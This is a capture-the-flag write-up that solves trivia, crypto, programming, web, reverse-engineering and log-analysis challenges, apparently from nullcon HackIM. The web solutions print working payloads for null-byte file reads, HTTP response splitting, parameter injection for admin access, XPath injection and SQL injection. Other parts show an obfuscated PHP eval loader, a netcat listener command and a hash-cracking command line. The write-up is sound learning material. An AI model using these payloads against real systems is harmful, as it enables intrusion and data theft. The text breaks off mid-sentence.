3. Trivia Levels
Trivia Level 1
Official Hint: N/A
Page Source: Nothing Interesting
Description: This operating system also refers to a 1982 science fiction film, a board game, and
a song off the Prodigy B-Side "What Evil Lurks"
Analysis: A quick Google search with the keyword “scifi movie list 1982” revealed android as
the first result.
Flag: android
Trivia Level 2
Official Hint: N/A
Page Source: Nothing Interesting
Description: This fictional IPv4 packet header field was proposed in RFC 3514 as a means for
identifying packets with malicious intent.
Analysis: Google search with the keyword “fictional IPv4 packet header field” revealed the flag.
Flag: evil bit
Trivia Level 3
Official Hint: N/A
Page Source: Nothing Interesting
Description: This humorous RFC of the Internet Engineering Task Force describes a
communication and control protocol suite designed for allowing infinite numbers of monkeys
with infinite numbers of typewriters to produce the entire works of William Shakespeare.
Analysis: Google search with the keyword “communication and control protocol suite designed
for allowing infinite numbers of monkeys” revealed the flag.
Flag: RFC 2795
4. Trivia Level 4
Official Hint: N/A
Page Source: Nothing Interesting
Description: Metasploit was originally coded for what purpose?
Analysis: I can remember going through the book “Metasploit Toolkit” where it was mentioned
that metasploit was originally started as a network security game.
Flag: game
Trivia Level 5
Official Hint: N/A
Page Source: Nothing Interesting
Description: Released on April 1st 2003, this esoteric programming language uses spaces, tabs
and linefeeds to compose commands.
Analysis: Google search with the keyword “April 1st 2003 programming language” revealed the
flag as whitespace.
Flag: whitespace
Crypto Levels
Crypto Level 1: Ulta Pulta
Official Hint: poiuyt
Page Source: <! -- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-
keyboard-computer-mirror1_VXLbh_24429.jpg"> -->
Description: Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy.
ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik
xwy qailki Oexjwok, 2 Ceaa Glyik
Analysis: The page source revealed the image of keyboard mirrored. Observing carefully each
character in the given string with the keyboard by mapping right side with the left and vice versa.
Flag was revealed.
5. Keyboard Mapping:
3 == 0
- == 2
. == ,
q == p
a == l
z == m
Flag: Windows 2000 already contains features such as the human discipline component,
where the PC can send an electric shock through the keyboard if the human does
something that does not please Windows. - Bill Gates
Crypto Level 2: White Noise
Official Hint: Follow the White Rabbit: P (by spnow)
Page Source :<! -- md5sum: b80a5ce8b0c6c57a0258f34dd5905970 -->
Description: shhhkoinahihai
Analysis:
First Attempt (leet way):
I went through the wikipedia about Whitespace (programming Language) and got and idea that
the given whitespace contains tabs and space which must be replaced by 1 and 0.
1. Copied the whitespace to gedit (text editor).
2. Replaced the tabs with 1 and space with 0.
3. Got the following sequence of 0’s and 1’s
6. 4. Now, this binary sequence needs to be converted into something meaningful, therefore , I
google for “binary to text translator” and got an online tool at
http://home.paulschou.net/tools/xlate/
5. Translated the binary sequence but to my surprise, I couldn’t get any meaningful
information Where did I have it wrong?
Second Attempt (leet way):
6. After I thought, came to conclude, how about replacing tabs with 0 and space with 1?
7. There, got a new sequence, with expectations.
8. Again I used the same binary to text translator, and Voila!!! There was our Flag
7. Alternate Method:
The above method seems to require lots of hard work precisely.
Thus, we can even solve the above problem with this alternate way:
1. Copy the whitespace to gedit (text editor) and save it.
2. In linux there is a utility called as “tr” utility to translate characters.
3. Type : cat whitespace.txt | tr "t " "01" at terminal.(Note:there is space after t)
4. There is our binary sequence; again we can copy it up in the binary to text translator to
get the flag.
Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot
Repeat Any of Your Previous 30689 Passwords - MS KB 276304
Crypto Level 3: The Base Test
Official Hint: http://lmgtfy.com/?q=RFC+for+base+encoding
Page Source: ====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====
Description: N/A
Analysis: I went through RFC 4648 twice, but didn’t find anything highly influencing that could
eventually get me to the flag. However got a very basic idea about the patterns of various types
of base encodings.
My assumption on the given string was:
- Rot-13
- Reverse
- Base64
- Base32
8. Went past through combinations of several of the above assumptions, and finally got the flag
with the following steps:
1. Remove = from both the ends of the given string.
2. Reverse the string.
“JVJDEVZWKZCFGTSGIRLUWVJTJJHFMUKXLFMUYT2NKJEEOTZSJRK
U4RJ5HU6T2PJ5”
3. Apply base32 decoding
“MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======”
4. Again apply base32 decoding with the result on Step 3 , to get the flag.
To reverse the text: http://textmechanic.com/Reverse-Text-Generator.html
To decode base 32 :http://online-calculators.appspot.com/base32/
Flag: duoTriGeSimalandNgiti
Crypto Level 4: Elucidate
Official Hint: N/A
Page Source :<! -- md5sum: ad4e2705406ef1197f03f93474e30020 -->
Description: Elucidate
Analysis: Nothing seems to be better than sleeping rather than go on decoding those obfuscated
php script. The first laziest thing that I decided to do was to look for an online tool that would do
the job without requiring going through several decoding steps.
Eventually I came across an online tool:
http://www.whitefirdesign.com/resources/unobfuscate-php-hack-code.html
Now back to analysis part again. Let us understand the script in part wise:
<? php
$vaa8089358f2="x62141x73145x3664x5f144x65143x6f144x65";@eval
($vaa8089358f2 ("**base 64 encoded string**"));
?>
- On the first line, a variable is being set to a string that’s being represented by a mix of
hexadecimal (‘x’) and octal (‘’) escape sequences. Python uses the same escapes as PHP for
hex and octal, so it’s easy to use python shell to see a “normalized” ASCII representation of
these strings:
Python Shell Below:
>>> "x62141x73145x3664x5f144x65143x6f144x65"
'base64_decode'
9. - Next idea was to decode the base64 encoded string.
- I used the online tool mentioned above and got an unformatted php script.
- A quick Google search revealed that there was a php formatter at
“http://www.prettyprinter.de”
- So by this time I had decoded the base 64 encoded string with proper formatting.
- On further analysis found another obfuscated script:
@eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc
8b9a2789e95fa("yIIgnkcORC4eT5SRD0cho3s2WqMVXWozH4hRSSXY7B0YBDtdngd0cs+9f96rZnyjS/jj7hmZZ
8+87M2sTxT1NWZoRJljzDMMXNUXppQ/rLQG89Uy+9UlsxyVrWmoGozLR7ilMhAai8gyemgw0aVKsNMFMeo
j3UOjhsR6TP2Z4WVZvIzgmX9r/6j7l6mw1agjlawTPb9kZk08qlP08gXt8pxW2txJNVWt1uyqrZoOHyAjLA4Xd6la
nOsZj9e3lE9Fuy4bU/mZC5KemoeKUXECwb/WHKBDPY7lz8sIiNb2VU9Wq+MfSvwmzzxnphJxlvz3XtCOsSRL
mc/mUHEd5KcJUMfe1L8OjjXYn+/oSAnfxD7jKTxVNLWEmuLDzZL7omK1VavnU6kDb1C0nx7123qZguxg1v3+
xVMqCZ43iJoxENOxGzaOAA5zDFxXwzMZOthn+4XYQZCC/H9lIl6iIin+/BSG0Mf9310hya7rLywnQBBV3S1/h
Mc8+UE9B764+Uj7aalqKA+ZlpHY/LsW+Bcz3PqUjlUMeO79bsS67a7wzYKhscgvTBp+4bF0TV2mSxTeEJzBnu8
J623YhwZrQTZf94R5de1JCTAXpfLY5KVyIrk0M/bxjcFPDTzaISXHrMXb5/a0FGXHtOY1VgecMP/kmSRdCAAx
k/ojrAVaJrfy+bSRPFu5MIsw1UT2RiRRIYmvsGkUC+Fj8ks5Uu76Nni47+ARaclzp4jQFIY0MkIrUFslxscIUvmcV
qaeINrbpVI/unqFCWUlwirlfd9krZYM+r3k2gLeF/nv4uUmSP7Sf8/8EA0KyhkGsI7HZ/fsQ2QiGQhQ3p687p2CZ
+yklj4fKEmJcfq2JQ3vaqGGBwsxkhu0F81tXcT67WlED2M5BmZ2eDq2dkLqMC6z720S66eSxPLAAunJ1jgEAKN
737geMYA9xjMxqCxC"))));
- And there was another base 64 encoded string inside it.
- Now the online tool comes into play. The above script is of the form:
- @eval(gzinflate(base64_decode(str_rot13("base64_encoded”))));
- The output revealed some kind of bot net behavior, however at this point I was least
bother about this fact, and kept on observing it.
- A quick overview of the output attracted me with following variable:
- $_4fa3332ef3d19e9840387434b8d28780 =
"x6f156x6c171x62171x6f142x73145x72166x69156x67164x68151x73143
x6f156x64151x74151x6f156x77157x75154x64164x68145x72145x73165x
6c164x73157x66157x75162x77157x72153x62145x72145x67141x72144x
65144x61163x66165x6c154x79143x6f156x63154x75163x69166x65141x6
e144x61163x68141x76151x6e147x65154x75143x69144x61164x65144x74
150x65156x6f162x6d141x6c143x6f165x72163x65157x66164x68145x701
50x65156x6f155x65156x61";
- Hoping this would be the final step, I used the python shell, In case if anyone doesn’t
have python installed, Google App Engine for python would really be helpful at
http://shell.appspot.com/ , or may be there can be multiple ways to decode that
>>>"x6f156x6c171x62171x6f142x73145x72166x69156x67164x68151x73143x6f
156x64151x74151x6f156x77157x75154x64164x68145x72145x73165x6c164x73
157x66157x75162x77157x72153x62145x72145x67141x72144x65144x61163x66
165x6c154x79143x6f156x63154x75163x69166x65141x6e144x61163x68141x76
151x6e147x65154x75143x69144x61164x65144x74150x65156x6f162x6d141x6c
143x6f165x72163x65157x66164x68145x70150x65156x6f155x65156x61";
'onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavin
gelucidatedthenormalcourseofthephenomena'
10. Flag:
onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandas
havingelucidatedthenormalcourseofthephenomena
Crypto Level 5: Yeah! As you guessed, it’s Steganography
Official Hint: Yeah! As you guessed, it’s Steganography
Page Source :<!--
Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU
Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme
and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor
Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd
-->
Description: Llun Saving Bank is fed up with known encryption standards to store the data.
They decided to reinvent the wheel. Can you decode the data?
Analysis: Close looks with the initials of title “Llun Saving Bank” suggest LSB. I didn’t know
much about LSB encoding technique in text; however I have come across one with image in
some war-game. I had a look over LSB on wikipedia and got an idea to include the rightmost bit
of each character. I converted the given text into binary and whoa, I was left with long list of
binary. This was a real challenging job to get the rightmost bit. Therefore a simple python script
made my task easier:
result = ''
ciphertext = '<paste binary here>'
for i in range(7, len(ciphertext), 8):
result += ciphertext[i]
print result
Note: My python script assumes the binary with space between each word. Something like
“01001000 01110011 00100000…….” And so on.
On executing the python script, I was able to get the LSB of each character to which I converted
to ASCII using http://home.paulschou.net/tools/xlate/, and there was our flag in plain text.
Flag: Learn howto Hide in Plain Sight
11. Programming Levels
Programming Level 1: ROTOMATA
Official Hint: N/A
Page Source :<! -- We only know the first 6 characters: "Men at" -->
Description: Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm
nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit
Analysis: I really didn’t spend much time on decoding the whole string. Rather analyzed the
difference between first three words, and then google for it.
M-M=0
e-f=1
n-p=2
space=3
a-e=4
t-y=5
space=6
s-z=7
o-w=8
m-v=9
e-o=10
Hence, the first three words, that I obtained was “Men at some”. After I google it, I got the
famous quote by William Shakespeare, which was the flag.
Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our
stars, but in ourselves, that we are underlings
12. Programming Level 2: Pascal’s Triangle
Official Hint: N/A
Page Source :<! -- ex: The sum of all middle terms till first 6 rows is 9 -->
Description: The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle
Analysis: This seemed to be easy at first sight. My first expectation was to get some cooked up
code but that really didn’t worked out, to hell all I got was algorithms and some frustrated guy
like me crying on the discussion forums to get their erroneous triangle code worked out. Googled
Pascal triangle went through wikipedia about Pascal triangle, wolframalpha- Pascal triangle,
Frustration takes you at any height of paranormal activities. After spidering and crawling through
the links, came across some useful resources:
http://rosettacode.org/wiki/Pascal's_triangle
http://www.mathsisfun.com/pascals-triangle.html
http://www.mathwords.com/b/binomial_coefficients_pascal.htm
http://www.youtube.com/watch?v=OMr9ZF1jgNc
-. So all up, time to do some serious coding.
- The challenge considers the middle term of odd rows.
- Wrote a code on c and hoped it would worked out, failed
- Looked for some java code, compiled successfully, but when I executed it, I was staring on my
LCD, the program went on running for more than 30 seconds on my i5, that was stack overflow.
- Time for some manual again, overlooked and realized that binomial coefficients can be
essential to get me the flag.
- Worked out again for the 3rd time now in python, with unexpected hope, executed it got
something, and voila!!! that was the flag,
This was the python script:
#!/usr/bin/python
from math import factorial
p=0
s=0
for n in range(0, 1337, 2):
s += factorial(n)/(factorial(p)*(factorial(n-p)))
p += 1
print s
Flag:4365932474188423707093600683230364311423941198777278660206654343120587216
667436233239359631257671906424254797004032326756653034333310397082007259357870
623427662432460587818667097226705645987145656659456934356498862160032628647508
069786551862253737753435645565104842509752373488183866315706330467111008238321
829445373767874422156015835789685633070319435688289548287438365157627110284786
6170999680296497
13. Programming Level 3: Your Brainfuck Sir...
Official Hint: N/A
Page Source :<! -- md5sum: 4f1ec9481c0f0ae0a199ea5c8dedf62d -->
Description: Debug bfcode to get the flag
Analysis: I had encountered brainfuck earlier but never this way. A Google search for brainfuck
interpreter resulted in http://www.iamcal.com/misc/bf_debug/ . Executed the given code without
any input in the interpreter and observed the result. Something appeared partially which doesn’t
seem to throw any useful meaning. Tried with some random input and got the same output again
and again. May be defect with the interpreter, LOL. It’s MANUAL time now.
Glanced across the lines in wikipedia about the brainfuck programming. There I got to see the
small “Hello World” program. I executed it in the interpreter, and got the output successfully.
Observed the “Hello World” in brainfuck where each line was ending with a period. Period has a
special meaning in brainfuck programming. It is same as print statement which the given
brainfuck code was missing.GOT IT!!! So appending a period at the end of each line was all
about getting the flag.
Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs
after you..
Programming Level 4: Substitute Problem
Official Hint: N/A
Page Source :<! -- md5sum: 31178aa23ef43566009d97f38a470279 -->
Description: deobfus
Analysis: There wasn’t much to do with this; everything was self explanatory in the page itself.
The only thing required with this challenge was plenty of time with lots of concentration.For me,
It nearly took continuous 2 hours to get through all the iteration. Probably some hardcore
programmer would have written a simple code to get it done in few seconds. So mine time
complexity with this problem was exponentially equivalent to one with the programmer’s.
Final iteration revealed the code as:
SEDULoUSLY ESCHEw oBFUSCAToRY HYPERVERBoSITY A
N D P R o L I X I T Y 8 4 R o E D Y GREEN
On attempt with variation of case, got the final flag.
Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
14. Programming Level 5
Official Hint: N/A
Page Source: Nothing Interesting
Description: A pinch of salt for your coffee, Sir?
Analysis: I’m really bad at brute forcing and guessing un-natural passwords. With hope to get it
correct this time, I went to salt.asp page and generated hash for few random keywords. Sorry
wouldn’t share those, crazy ones, nearly killed my system with overheating: D
The basic idea was to crack the hash and identify the salt which was the flag to complete this
challenge. I looked around for the md5 cracker and got one at http://3.14.by/en/md5. Next i tried
to crack the hash for the random keywords. After a while, my system temperature went above
critical level and had to shutdown the process, that was really disgusting job to watch over the
LCD and wait for the cracker to do its job, the cracker doesn’t seems to understand that my
system is not a blade server or may be I don’t. On a final note, I decided to take hash for either
single word or digit and crack it. Again the same boring task, at first set I generated the hash
from 0-10, and finally on second attempt with the hash for “1” I got my flag.
Working Steps:
1. On the page salt.asp input password as 1.
2. The hash thus generated for my system was “243dc4f11700aa3bd6c7de312bb0ca31”
(Note: each system will generate a unique hash).
3. Fire up the windows console , and type the following at the command prompt:
barswf_cuda_x32.exe -h 243dc4f11700aa3bd6c7de312bb0ca31 -c 0a
4. After approx 2 minutes on my i5, the cracker successfully displayed the result.
15. 5. There we had our key as : “1c183e7”
6. That means "1" + "salt("c183e7"). Since hash = Algo(password+salt)
7. In the given problem, 243dc4f11700aa3bd6c7de312bb0ca31=md5(1+c183e7)
8. And finally my flag was c183e7( Note: Each system will have a unique flag)
Flag: c183e7
Web levels
Web Level 1
Official Hint: N/A
Page Source: Nothing Interesting
Description: Can you view the bytes in password.asp from Me?
Analysis: As the description suggests, it was null byte injection. I had come across a problem on
null byte on one of the wargame.Let’s understand the problem. Our challenge was to read the
information from the file password.asp which somehow was protected by the server. Here we
can observe in the given URL that default parameter is test.txt, Multiple questions can arise here,
as such, why only test.txt as the parameter? If you don't do anything with a parameter, why take
one? Assume a real time application from my perspective, the idea with this level is that: We
have an application which takes a filename from us, reads it, and shows it to us. We found an
example of input, "test.txt".We know there is sensitive information in password.asp, But we can't
get password.asp. So let's imagine that whoever wrote this application which reads any file we
tell it to, wanted to keep us from reading anything but files which end in ".txt".So any input
which we give it that doesn't end in ".txt" is rejected. So here's the problem: How do we get a file
which ends in ".asp" when the filename we provide has to end in ".txt"?
The answer obviously is null byte but that would be a partial answer in the context of the
question “HOW?” In languages like ASP and PHP, the null byte doesn't end a string, it’s just
another character. In C-based languages (C, C++, C#) a null byte means the end of a string. So if
we give a PHP script a filename to open that has a null byte, it's different in PHP and in the OS.
So the filename might be "hello%00blah" to PHP. But it would be "hello" to the operating
system. Some applications append a file extension to the end of any filename we give them. So
we give them "hello" and they open "hello.txt" .Which is why we do “hello.php%00”. Because
PHP sees "hello.php%00.txt" and the OS sees "hello.php".
And after this long boring, worthless explanation, hence the flag.
Flag: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt
16. Web Level 2:
Official Hint: Judgment of Solomon
Page Source: Nothing Interesting
Description: Can you redirect ME to hackim.null.co.in?
Analysis: I had to go through the hint to get this one done. After few attempts with variation of
parameters, arbitrarily I had to go through the boring story on wikipedia. The summary of story
was, “Solomon suggested that the baby be split in half and each half given to one of the women
claiming to be the mother”. So, the hint refers to the word "split". On quick search with the string
“HTTP Splitting” returned several results. Studied few of them, showing various PoC’s and
realized that I had spent most of my time injecting the http response rather than redirecting it.
Hence finally I got the level done with several parameter variations.
Flag: http://www.nullcon.net/challenge/wlevel-2-
proc.asp?page=%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in
===========================================================================================
Web Level 3:
Official Hint: Proxies are golden friends
Page Source :<! -- If you're still reading, better register Mate :)-->
Description: Click here to Login || Click here to Register
Analysis: In this level we were entertained with two options, register and login.I clicked on both
of them and went through the page source, nothing seemed interesting. Had a thought that it
could be vulnerable to some kind of injection. On next step I filled up the form and register,
Wow my registration my successful, didn’t expected though.But on login with those credentials
all I got was an error message “Only ADMINS are Welcome!”.Came back again on the
registration page and tried with another input. There I observed the page source, and cool there
we had something interesting this time, in this format:
<!--Debug Info: INSERT 'uname|pass|uname|uname@localhost.com|admin:no|comment:new
user' INTO USER DB FILE -->
So, it was all here, the parameter with admin:no was passed into the database. Now there was not
much to do, next I used burp suite to check how the parameter were passed.
17. On the last line we can observe inside the window how parameters are passed to the server. This
format was similar to earlier as what we got on the post registration page source. So all we had to
do was add admin:yes as per the format. Even this process annoyed me a lot, since on single
attempt I couldn’t get it correct.
So, the correct format was:
username=me.admin&name=admin&password=admin&email=admin%40localhost.com|admin:yes&Submit=Register
And finally I registered myself as the admin, and got the flag.
Flag: b3149ecea4628efd23d2f86e5a723472
18. Web Level 4: Can You Get Me all the Data?
Official Hint: if you think you've seen all the data, i'm afraid you're mistaken
Page Source: Nothing Interesting
Description: 2007 && 2002
Analysis: At the beginning of this level, I was getting no idea at all for what really was required
with it. After hovering with the links around for few hard hours, I got a cool link on OWASP:
https://www.owasp.org/index.php/Interpreter_Injection
There were few interesting attack vectors which foolishly I tried, in vain had no luck. I noticed
the description again and understood it was asking to reveal data from the server and then I
realized that blindly I tried with those injection parameters. On my next attempt I went on
looking for cheat sheet on various attack parameters. I collected few of them and studied those.
Those were beyond my understandings. Helplessly shouted in the IRC and got some clue, clue
which again required traversing blindly. Eventually I came across an article:
http://palpapers.plynt.com/issues/2005Jul/xpath-injection/ which described xpath injection is
simple understandable language and then a good cheatsheet over here:
http://www.simple-talk.com/dotnet/.net-framework/xpath,-css,-dom-and-selenium-the-rosetta-
stone/
I tried with those attack vectors, and got the flag unexpectedly with this one:
input='] | /* | /foo[bar='
I completed this level blindly, a bad one.
Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear
Web Level 5:
Official Hint: It’s SQLi
Page Source: Nothing Interesting
Description: Do You Have What IT Takes to Break into the World's Most Secure Login
System?
Analysis: The very first thing anyone would try out after looking at the page at one sight was the
very common SQL Injection (“ or 1=1--) and yes I was on the same side of the coin. As usual I
was wrong again. Assuming it to be a blind SQLi, looked around www.1337day.com and
www.exploit-db.com in hope of getting some good papers. On the very first link of exploit-db I
got to see a paper on advanced blind sqli, went through it and there was some attack vectors
against web firewalls. With positive hope tried and with the second attempt using '<>'1 as the
username and password made it to the flag.
Flag: 47c1b025fa18ea96c33fbb6718688c0f
19. Reverse Engineering Levels
Reverse Engineering 1: Basic Test
Official Hint: N/A
Page Source: <!-- md5sum: 9d428bdcb07127ff4358f7d487445470 -->
Description: justdoit.exe
Analysis: The given binary seemed to be suspicious. So before executing it I decided to analyze
and verify if it was safe to execute. I dumped the binary into hex editor and observed it. The
headers showed that it was UPX packed. I unpacked it using “Universal Extractor” and went
through it again, no conclusion, finally executed it inside the vmbox and analyzed the behavior.
At first instant I couldn’t get anything from it, executed it few more times and saw automation
done by the exe. Then I went to google and searched for the string “keyboard automation” and
there first option showed AutoHotKey.Eventually ended up looking for Exe2Ahk at
http://www.autohotkey.com/download/Exe2Ahk.exe
After successful decompilation, found the flag in plain text.
Flag: We could talk all day about what AutoHotKey can do for an online poker player
Reverse Engineering 2: Ask nicely, it will give you what you want
Official Hint: Take another path.. in general look for interesting code blocks & execute them..
code can be anywhere in the PE, even in data | Resource? No Resource
Page Source :<! -- md5sum: c786287c7825784a85413695a9e319fc -->
Description: HackIM.exe
Analysis: I consider this as the most insane level in the whole CTF competition. Nearly spent
two hacking days to get past through it. To understand the binary, I nearly downloaded all the
tools found in google having the string “PE”, went through various articles on Reversing PE, and
nothing worst than that shifted to 3 different debuggers one bye one. Ultimately after tracing the
flow of program for several times in the Olly debugger, following steps concluded the flag:
1. As the hint was suggesting, “No Resource “, I loaded the PE into Resource Hacker to see
if what exactly its meaning was. Encountered the following error.
20. So it was clear from this error that, there was something wrong with the resource section.
2. I turned up into Olly debugger, loaded the PE and went to the memory window (ALT+M).
3. At offset 0040C000, there was the .rsrc (resource) section. I changed the access to the section
from Read to Full Access.
4. Tried running the program but couldn’t get anything desired. Popped over the hint again
and there it was asking to execute the resource section.
5. So now it was time to place the jump instruction somewhere so as to execute the resource
section.Came back to CPU window (ALT+C).
6. Just below the program entry point, at offset 00401273 there was a JMP instruction.
21. 7. So all I had to do was place the jump over the resource section which was the offset
address 0040C000.
8. And finally running the program I got the flag in the messagebox.
Flag: AreYouHappyNow?
22. Reverse Engineering 3: null Mobile Android App
Official Hint: N/A
Page Source :<! -- md5sum: fd81ba87c0edc1f37250e680a49260d8 -->
Description: We’re proud to announce the null Mobile Android App Project; however the
application is currently in Beta Phase and requires lot of attention from the testers. In keeping
with the spirit of HackIM we've hidden a Flag inside. Your task is to find the Flag.
Analysis: I didn’t have much hard time with this one as of before. I unpacked the apk file with
Winrar and went through the contents. Inside folder res>raw there were two files code.js and
junk.php. The JavaScript inside code,js was in unformatted state. I formatted it using
http://www.jsbeautifier.org and went through it, couldn’t get anything interesting. Next opened
the junk.php file in Ultraedit and after a careful observation there at line 72 I got to see the
packed javascript function, finally an online tool at http://www.strictly-software.com/unpacker
helped me to unpack the javascript function, revealing the flag inside it.
Flag: Do not let what you cannot do interfere with what you can do.
Reverse Engineering 4
Official Hint: we’ve updated the binary with hints, request all to download again to proceed
Page Source:
<! -- md5sum: 7c87b2bfe4e02dbb32e2c3067cb93692 -->
<! -- <center><h3><a href="data/script">script</a></h3></center>
<! -- md5sum: 849f2d8c6e22604cba8fe4904803de10 -->
Description: REL4 UPDATE: WE have updated the binary with some hints inbuilt, Request all
to download new RE binary to proceed.
Analysis: My first attempt with the given file was to analyze its type. I used the file identifier
called TrID File Identifier also available online at http://mark0.net/onlinetrid.aspx. The result
showed up that it was an ELF binary. So I cross verified it on the terminal:
23. It showed up that the binary was stripped. Tried executing it and was entertained with the
following error.
I tried with strace and ltrace command but couldn’t learn much from those outputs.
The error indicated something about time machine, so I turned up in google and looked for
anything interesting on time machine, however couldn’t find anything to help.
The next thing I did was to change the system date to some back year. I changed it to year 2000.
Tried executing the binary again, and voila there was no error but even no flag. Tried giving
some parameter but that too didn’t help anything. Next I opened the new terminal and tried
looking into the current processes running using the command ps –aux and got a long list. It was
difficult to figure out so again tried filtering it using the command: ps –aux | grep script2 and
whoa, unexpectedly got to see the some shell script. Went through it, and there our flag was in
plaintext.
Flag: Nature has neither kernel nor shell; she is everything at once
Reverse Engineering 5: Got Dumped :(
Official Hint:
Page Source :<! -- md5sum: 043e4cc85c519723fad18dce7502371c -->
Description: lol.rar
Analysis: This challenge was about the crash dump analysis. I opened it in hex editor and went
through the few lines got an idea that it was a windows crash dump. Next I installed Windbg
with proper symbol configuration and loaded the dump into it.I was unaware of any such
analysis and went through few links on google. Got some good information and few cheatsheets.
Ultimately the following steps help me to understand the dump.
1. First we had to recognize the file that caused the crash. Command: !analyze –v showed u
that stub.exe caused the crash.
2. Next we had to extract stub.exe from the dump to analyze it.So for this there is a sos
which is used for .NET debugging( to dump dll and exe).
3. .load clr10sos.dll
4. !sam folder_location
5. Now we had stub.exe. Next I loaded the stub.exe into Olly dbg. Step into the instruction
and realized that the jump was passing to the crash portion of the assembly. Tried to
bypass it by jumping it to the messagebox function. I got the messagebox but there was
no flag in it. Again went back to windbg and checked for the PID since there was a
GetProcessID function in the assembly. I got the PID as 0xA60 then I patched the
GetProcessID to return 0xA60 and finally got the flag.
24. Flag: TheLastSamurai
Log Analysis
Log Analysis 1: Basic
Official Hint: N/A
Page Source :<! -- md5sum: 1e2612e8ff3d4651c7d5fc67f2797906 -->
Description: report
Analysis: In this challenge the log was not too large but took a long time to understand. Every
line had a cool piece of information. On carefully observing through the lines, I found
something very interesting on line number 31:
+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled:
/challenge/logically_insane/
Checked into it and wow found two files, but at the very next moment, realized that the game is
still on. Said “Ask the proper question to get the proper answer”. Went on the page source and
got some more closer to the flag, there was a hint given on comment:
<!-- askmelater.asp?question=? -->
And to my surprise with my very first guess, I got the flag. HAPPY!!!
The final URL was:
http://nullcon.net/challenge/logically_insane/askmelater.asp?question=flag
Flag: 6bb61e3b7bce0931da574d19d1d82c88
25. Log Analysis 2: Mystery Password
Official Hint: N/A
Page Source: <!-- md5sum: 6eebd22df057377a436dad2d97fad8b6 -->
Description: log3.pcap
Analysis: There wasn’t much in this challenge. The log was unexpectedly small and within few
minutes anyone could solve it. I opened the log in wireshark. The easiest way was to learn the
log was to see the TCP stream. Right Click on the log window > Follow TCP stream, popped up
the TCP stream window. The very last line of the stream content revealed the password and with
next few attempts I got the flag.
Flag: ..Supp@..adm1n
26. Log Analysis 3: Clever Intruder
Official Hint: N/A
Page Source :<!-- md5sum: 396df3308184a77890cb708f05915f29 -->
Description: access.rar
Analysis: A 25MB log with approx 1 lakh lines. Seemed nearly impossible to analyze it, so
thought for a while and looked around google for some good log explorer so as to make task
easier, got few but they were all useless, I wasted my time, came back to my old favorite
Ultraedit and gave a quick glance through the lines. Learnt from the logs that:
- Logs were generated from different scanners.
- There was variation in IP.
- Scanning was performed on same date between fixed period of uninterrupted time.
- The HTTP Status Code for most of the request was 404.
Hence the last finding proved to be essential. Assuming we couldn’t find anything interesting
from a “Page Not Found” error. I tried my level best to separate all those logs to different tabs in
ultraedit.This was really a very hectic job, had I got some more knowledge wouldn’t be tough to
get past this hurdle easily. This level really made me realize how poor I m.After a long hours of
assumed work, eventually came across the line with an encoded base64 string
“bmMgLWwgLXAgNjY2Ng==” and on decoding got “nc -l -p 6666”. On the original log, this
was on line number 37409 (Ultraedit).
Flag:
27. Log Analysis 4:
Official Hint: Exploited!!!
Page Source :<!-- md5sum: afcc45de48c327847c507c68ad7e6bf4 Expected Format: CVE-
XXXX-XXXX -->
Description: CVE of the Exploit is the Flag
Analysis: This challenge was all about finding a CVE exhibited by the content in the log.
As mentioned it was a burp suite log. To make the view easier, I renamed the log file into
log.xml and opened it in web browser. Again this log had many 404 Not Found Requests.After
going through first few lines, came across the logs of Tikiwiki, there was other logs of joomla,
but I preferred to go sequentially. Since I m not good with exploit identification. I browsed to
http://nvd.nist.gov/ and searched CVE for tikiwiki. Most of the result returned CVE related to
XSS but in our log I couldn’t see any such XSS thing, so went with exceptions, and eventually
got the flag. Honestly I couldn’t understand which line in the log referred to the CVE, but I had
an answer for the question.
Flag: CVE-2005-1921
Log Analysis 5: Waat Laga Server
Official Hint:
Page Source :<! -- md5sum: c641fa00c0a84fd8fd954b3e75d5d6c8 -->
Description: dump.rar
Analysis: Again 95 MB of logs, loaded it into wireshark and tried for few minutes to look into it,
looked at first few lines and last few lines, honestly didn’t understood, as it was really difficult to
browse through each lines one by one. Tried to find some alternate way and couldn’t learn much
all I got was some bogus ads for shareware log explorers asking for $$$.Came back to
description again and noticed that for 3rd flag name was required. Googled for the string “Local
Privilege Escalation Exploit” and the search resulted some exploit-db papers. The interesting
thing I noticed that was CVE that may help me with author identification. Next challenge was to
look for CVE in such a huge log, used cat command but that didn’t help, again tried with few
more of them but there was no result, eventually ended up with the string command to get the
CVE;
28. Also found the paper at http://www.exploit-db.com/exploits/9479/ .Finally got my first flag for
the challenge: Tavis Ormandy Julien Tinnes. I studied the exploit and came to understand from
the title that it was local root exploit.
Now expectations were high with strings command and I extracted all the strings from the dump
to a plain text file.The command I used was:
strings dump.pcapng > dump.txt
By this time I had a stripped version of the log with with more important things.
Next I tried to look for the last flag that was for the root password. Since it was a local root
